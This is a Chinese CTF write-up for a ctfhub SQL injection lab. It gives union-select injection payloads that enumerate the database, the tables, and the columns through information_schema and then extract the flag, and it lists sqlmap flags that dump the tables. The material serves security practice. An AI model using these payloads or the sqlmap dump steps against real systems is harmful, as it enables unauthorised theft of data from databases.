2025.1.15——六、SQL结构【❤sqlmap❤】

题目来源:ctfhub技能树

目录

一、打开靶机,整理已知信息

二、手工注入解题

[step 1:查看注入类型](#step 1:查看注入类型)

[step 2:order by语句判断字段数](#step 2:order by语句判断字段数)

[step 3:爆数据库名](#step 3:爆数据库名)

[step 4:爆表名](#step 4:爆表名)

[step 5:爆列名](#step 5:爆列名)

[step 6:爆具体数据](#step 6:爆具体数据)

三、sqlmap解题------四步走

[step 1:--current-db](#step 1:--current-db)

[step 2:-D 数据库名 --tables](#step 2:-D 数据库名 --tables)

[​step 3:-D 数据库名 -T 表名 --columns](#step 3:-D 数据库名 -T 表名 --columns)

[step 4:-D 数据库名 -T 表名 -C 列名 --dump](#step 4:-D 数据库名 -T 表名 -C 列名 --dump)


一、打开靶机,整理已知信息

查看页面信息,提示"MySQL结构",所以为sql注入,两种思路:①手工注入;②sqlmap

二、手工注入解题

step 1:查看注入类型

键入:1

键入:1'键入:1''

键入:1 and 1=2 #

键入:1 and 1=1 #

由回显可得本题为整数型注入

step 2:order by语句判断字段数

键入:1 order by 2 #(根据经验,陌生题可使用二分法)

step 3:爆数据库名

sql 复制代码
1 and 1=2 union select database(),database() #

step 4:爆表名

sql 复制代码
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #

出现了奇怪的东西,继续看

step 5:爆列名

sql 复制代码
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='lcwaabhcjo' #

东西应该就在这里

step 6:爆具体数据

sql 复制代码
1 and 1=2 union select 1,zrlcbgazoj from sqli.lcwaabhcjo #

得到flag

三、sqlmap解题------四步走

step 1:--current-db

step 2:-D 数据库名 --tables

step 3:-D 数据库名 -T 表名 --columns

step 4:-D 数据库名 -T 表名 -C 列名 --dump

得到flag。【sqlmap------YYDS】

相关推荐
struggle20252 小时前
RushDB开源程序 是现代应用程序和 AI 的即时数据库。建立在 Neo4j 之上
数据库·typescript·neo4j
伤不起bb3 小时前
Redis 哨兵模式
数据库·redis·缓存
卑微的Coder3 小时前
Redis Set集合命令、内部编码及应用场景(详细)
java·数据库·redis
2501_915373883 小时前
Redis线程安全深度解析:单线程模型的并发智慧
数据库·redis·安全
呼拉拉呼拉3 小时前
Redis知识体系
数据库·redis·缓存·知识体系
霖檬ing3 小时前
Redis——主从&哨兵配置
数据库·redis·缓存
moxiaoran57534 小时前
uni-app学习笔记二十九--数据缓存
笔记·学习·uni-app
pop_xiaoli5 小时前
OC—UI学习-2
学习·ui·ios
Lin Hsüeh-ch'in6 小时前
Vue 学习路线图(从零到实战)
前端·vue.js·学习
卜及中6 小时前
【Redis/2】核心特性、应用场景与安装配置
数据库·redis·缓存